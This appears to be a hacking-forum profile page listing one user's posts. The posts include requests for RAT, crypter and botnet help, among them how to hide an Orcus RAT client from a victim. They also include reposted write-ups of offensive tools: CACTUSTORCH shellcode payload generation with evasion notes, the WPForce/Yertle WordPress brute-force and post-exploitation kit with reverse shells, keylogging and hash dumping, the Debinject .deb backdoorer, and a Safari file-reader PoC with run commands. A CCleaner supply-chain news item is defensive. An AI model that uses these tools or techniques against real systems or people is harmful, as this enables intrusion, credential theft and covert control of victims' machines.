Sub Zero

PRIV8
  • Content Count

    30
  • Avg. Content Per Day

    0
  • Joined

  • Last visited

Community Reputation

34 Excellent

2 Followers

About Sub Zero

  • Rank
    Leech #800000
  • Birthday 05/15/1990

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Sub Zero

    GalaxyWorkstation 1.5.0.4

    download link not working
  2. Sub Zero

    Proxy Shark 2018 v1.4 (Vip Pro Edition)

    Wrong rar password..
  3. Sub Zero

    CCleaner Hacked to Distribute Malware

    f you have downloaded or updated CCleaner application on your computer between August 15 and September 12 of this year from its official website, then pay attention—your computer has been compromised. CCleaner is a popular application with over 2 billion downloads, created by Piriform and recently acquired by Avast, that allows users to clean up their system to optimize and enhance performance. Security researchers from Cisco Talos discovered that the download servers used by Avast to let users download the application were compromised by some unknown hackers, who replaced the original version of the software with the malicious one and distributed it to millions of users for around a month. This incident is yet another example of supply chain attack. Earlier this year, update servers of a Ukrainian company called MeDoc were also compromised in the same way to distribute the Petya ransomware, which wreaked havoc worldwide. Avast and Piriform have both confirmed that the Windows 32-bit version of CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 were affected by the malware. Detected on 13 September, the malicious version of CCleaner contains a multi-stage malware payload that steals data from infected computers and sends it to attacker's remote command-and-control servers. Moreover, the unknown hackers signed the malicious installation executable (v5.33) using a valid digital signature issued to Piriform by Symantec and used Domain Generation Algorithm (DGA), so that if attackers' server went down, the DGA could generate new domains to receive and send stolen information. "All of the collected information was encrypted and encoded by base64 with a custom alphabet," says Paul Yung, V.P. of Products at Piriform. "The encoded information was subsequently submitted to an external IP address 216.126.x.x (this address was hardcoded in the payload, and we have intentionally masked its last two octets here) via a HTTPS POST request." The malicious software was programmed to collect a large number of user data, including: Computer name List of installed software, including Windows updates List of all running processes IP and MAC addresses Additional information like whether the process is running with admin privileges and whether it is a 64-bit system. According to the Talos researchers, around 5 million people download CCleaner (or Crap Cleaner) each week, which indicates that more than 20 Million people could have been infected with the malicious version the app. "The impact of this attack could be severe given the extremely high number of systems possibly affected. CCleaner claims to have over 2 billion downloads worldwide as of November 2016 and is reportedly adding new users at a rate of 5 million a week," Talos said. However, Piriform estimated that up to 3 percent of its users (up to 2.27 million people) were affected by the malicious installation. Affected users are strongly recommended to update their CCleaner software to version 5.34 or higher, in order to protect their computers from being compromised. The latest version is available for download here. Sursa: [Hidden Content]
  4. Hello my friends Request a code to disable the Registry Editor
  5. Sub Zero

    Hac Tool Fud Encrypt server H-worm (vbs files) v1.0

    Re: Hac Tool Fud Encrypt server H-worm (vbs files) v1.0 rar pass please
  6. Sub Zero

    CrypterHacker The Are Live!!

    Re: CrypterHacker The Are Live!! Greetings to you thank_you
  7. Sub Zero

    Orcus RAT v1.9.1 Cracked by de4d0t and TheProxy

    Re: Orcus RAT v1.9.1 Cracked by de4d0t and TheProxy [Hidden Content]
  8. Payload Generation with CACTUSTORCH CACTUSTORCH is a framework for payload generation that can be used in adversary simulation engagements based on James Forshaw’s DotNetToJScript tool. This tool allows C# binaries to be bootstrapped inside a payload, providing reliable means to bypass many common defences. Currently CACTUSTORCH supports the following payload types: VBS VBA JS JSE WSF HTA VBE Prior to this, it was not possible to invoke shellcode injection directly from multiple formats with the exclusion of VBA macros (more on this later in the post). CACTUSTORCH has a self-contained C# binary which accepts a binary name and base64 encoded shellcode to inject. Additionally, it borrows concepts from @armitagehacker / CobaltStrike’s VBA macro injection whereby it selects the 32 bit executable to inject into. State of Current Payloads Generation of payloads for the supported formats already exists in several frameworks, including Metasploit and Cobalt Strike. There are however some drawbacks to how these payloads are generated. In Metasploit framework the following payload formats work as such: VBS: File drop and execute – Touches disk. HTA-PSH: Runs powershell.exe with a WScript.Shell object – Powershell.exe and WScript.Shell are well known to blue team. VBA-EXE: File drop and execute – Touches disk. VBA: Shellcode injection by declaring Kernel32 API – Known indicators for Maldoc scanning. VBA-PSH: Runs powershell.exe with a Shell object – Powershell.exe is well known to blue team. In CobaltStrike, the following payload formats work as such: VBS: Weakens the target, creates a COM object to Excel, creates worksheet, injects VBA macro code and executes. – Relies on Office being installed and Kernel32 API declarations in injected VBA. VBA: Shellcode injection by declaring Kernel32 API – Known indicators for Maldoc scanning. HTA-EXE: File drop and execute – Touches disk. HTA-PSH: Runs powershell.exe with a WScript.Shell object – Powershell.exe and WScript.Shell are well known to blue team. HTA-VBA: Wraps around a VBS that does the weakening, COM object to Excel, macro injection of Kernel32 API declaration VBA code. Benefits of CACTUSTORCH CACTUSTORCH offers a number of improvements on current payload generation that are currently beyond the capabilities of the public frameworks: Does not use Kernel32 API declarations in the payload Obfuscated within the C# binary Allows for arbitrary specification of target binary to spawn. Allows for arbitrary shellcode to be specified. Does not spawn PowerShell.exe. Does not require Powershell. Does not require Office. Does not invoke WScript.Shell. Does not require staging as the full stageless shellcode can be contained within the delivered payload. No static parent to child spawn, the user can change what wscript.exe spawns. exe spawning Powershell.exe is suspicious, spawning rundll32.exe is arguably less indicative of compromise. You can change this to calc.exe, ping.exe /t or similar less suspicious binaries. Using CACTUSTORCH Using CACTUSTORCH is relatively straight forward, the following outlines the steps required to generate a custom payload: Select the payload format you want to use from the cloned directory Select a binary container you want to inject into, has to exist in both SYSWOW64 and SYSTEM32 Generate raw shellcode for your listener $> cat payload.bin | base64 -w 0 > out.txt Copy the out.txt base64 raw payload into the “code” variable of the template If doing it for the VBA, run the out.txt through vbasplit.py out.txt split.txt Then copy the split.txt into the code section highlighted in the VBA template [*]Payload is ready Do obfuscation if you want A video demonstrating these steps is shown below: Integration with Cobalt Strike As part of the process for streamlining adversary simulation engagements so that more time can be placed into creating more sophisticated and bespoke attacks, Vincent has created a CACTUSTORCH aggressor script to facilitate this. After loading the aggressor script, the following menu is presented as an option under the “Attack” tab. You can now select the payloads you want to use and options, it will generate the payload and host it for you. In terms of the VBA code, it will be presented in a textbox where it can be copied from and pasted into a Word VBA Macro. The aggressor script is demonstrated in the following video: [video=youtube;_pwH6a-6yAQ] Credits The scripts, proof of concepts and aggressor script addon is created by Vincent Yiu of the ActiveBreach team. We would like to also thank the following people for their contributions: @tiraniddo: James Forshaw for DotNet2Jscript @cn33liz: Inspiration with StarFighters @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into @_RastaMouse: Testing and giving recommendations around README CACTUSTORCH can be downloaded from the [HIDE-THANKS]MDSec ActiveBreach github[/HIDE-THANKS] page. Sursa: [HIDE-THANKS][Hidden Content] [/HIDE-THANKS]
  9. About: WPForce is a suite of Wordpress Attack tools. Currently this contains 2 scripts - WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post exploitation modules. For more information, visit the blog post here: [HIDE-THANKS][Hidden Content]] Features: Brute Force via API, not login form bypassing some forms of protection Can automatically upload an interactive shell Can be used to spawn a full featured reverse shell Dumps WordPress password hashes Can backdoor authentication function for plaintext password collection Inject BeEF hook into all pages Pivot to meterpreter if needed Install: Yertle requires the requests libary to run. [Hidden Content]: python wpforce.py -i usr.txt -w pass.txt -u "[Hidden Content]" ,-~~-.___. __ __ ____ _____ / | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___ ( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \. \_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/ ==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___| / \-'~; || | / __/~| ...||__/|-" Brute Force Attack Tool for Wordpress =( _____||________| ~n00py~ Username List: usr.txt (3) Password List: pass.txt (21) URL: [Hidden Content] -------------------------- [xxxxxxxxxxxxx@gmail.com : xxxxxxxxxxxxx] are valid credentials! - THIS ACCOUNT IS ADMIN -------------------------- -------------------------- [xxxxxxxxxxxxx@icloud.com : xxxxxxxxxxxx] are valid credentials! -------------------------- 100% Percent Complete All correct pairs: {'xxxxxxxxxxxxx@icloud.com': 'xxxxxxxxxxxxx', 'xxxxxxxxxxxxx@gmail.com': 'xxxxxxxxxxxxx'} -h, --help show this help message and exit -i INPUT, --input INPUT Input file name -w WORDLIST, --wordlist WORDLIST Wordlist file name -u URL, --url URL URL of target -v, --verbose Verbose output. Show the attemps as they happen. -t THREADS, --threads THREADS Determines the number of threads to be used, default is 10 -a AGENT, --agent AGENT Determines the user-agent -d, --debug This option is used for determining issues with the script. python yertle.py -u "[username]" -p "[password]" -t "[Hidden Content]" -i _..---.--. __ __ _ _ .'\ __|/O.__) \ \ / /__ _ __| |_| | ___ /__.' _/ .-'_\ \ V / _ \ '__| __| |/ _ \. (____.'.-_\____) | | __/ | | |_| | __/ (_/ _)__(_ \_)\_ |_|\___|_| \__|_|\___| (_..)--(.._)'--' ~n00py~ Post-exploitation Module for Wordpress Backdoor uploaded! Upload Directory: ebwhbas os-shell> -h, --help show this help message and exit -i, --interactive Interactive command shell -r, --reverse Reverse Shell -t TARGET, --target TARGET URL of target -u USERNAME, --username USERNAME Admin username -p PASSWORD, --password PASSWORD Admin password -li IP, --ip IP Listener IP -lp PORT, --port PORT Listener Port -v, --verbose Verbose output. -e EXISTING, --existing EXISTING Skips uploading a shell, and connects to existing shell Yertle currently contains these modules: Core Commands ============= Command Description ------- ----------- ? Help menu beef Injects a BeEF hook into website dbcreds Prints the database credentials exit Terminate the session hashdump Dumps all WordPress password hashes help Help menu keylogger Patches WordPress core to log plaintext credentials keylog Displays keylog file meterpreter Executes a PHP meterpreter stager to connect to metasploit quit Terminate the session shell Sends a TCP reverse shell to a netcat listener stealth Hides Yertle from the plugins page [HIDE-THANKS]Download WPForce-master.zip[/HIDE-THANKS] Source: [HIDE-THANKS][Hidden Content]]
  10. Sub Zero

    Safari local file reader

    How to start Clone files [HIDE-THANKS]$ git clone git@github.com:Bo0oM/Safiler.git $ cd Safiler[/HIDE-THANKS] Run server $ [sudo] pip install -r requirements.txt $ python server.py Open PoC Open PoC.xhtm or PoC.webarchive in Safari. Copy on a USB flash drive and carry it with you Demo Sursa: [HIDE-THANKS][Hidden Content] [/HIDE-THANKS]
  11. Sub Zero

    Debinject

    [DEBINJECT] Copyright 2017 Debinject Written by: Alisson Moretto - 4w4k3 - UndeadSec TOOL DESIGNED TO GOOD PURPOSES, PENTESTS, DON'T BE A CRIMINAL ! Only download it here, do not trust in other places. CLONE [HIDE-THANKS]git clone [Hidden Content]] RUNNING cd Debinject python debinject.py If you have another version of Python: python2.7 debinject.py RUN ON TARGET SIDE chmod 755 default.deb dpkg -i backdoored.deb DISCLAIMER "DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." Taken from LICENSE. PREREQUISITES dpkg dpkg-deb metasploit TESTED ON Kali Linux - SANA Kali Linux - ROLLING SCREENSHOT More in Screens CONTRIBUTE Send me more features if you want it I need your Help to become it to better. LICENSE: This project is licensed under the BSD-3-Clause - see the LICENSE file for details. Sursa: [HIDE-THANKS][Hidden Content]]
  12. Sub Zero

    Solar Botnet || Coded IN Pascal

    Re: Solar Botnet || Coded IN Pascal Gentlemen, I'm sorry for the stupid questions. So I can not understand Solar Bot commands. Explain, please, what to write in the fields: 1)Parametr 2)Limit 3)Bot GUID
  13. Re: How to prevent Orcus Client from appearing in the taskbar ( victim) Yes it succeeded Thank you
  14. Hello my friends How to prevent Orcus Client from appearing in the taskbar victim
  15. Sub Zero

    Tutorial Crypter en Autoit BY Blau

    Re: Tutorial Crypter en Autoit BY Blau Error Compile (builder and Stub) builder Error stub Error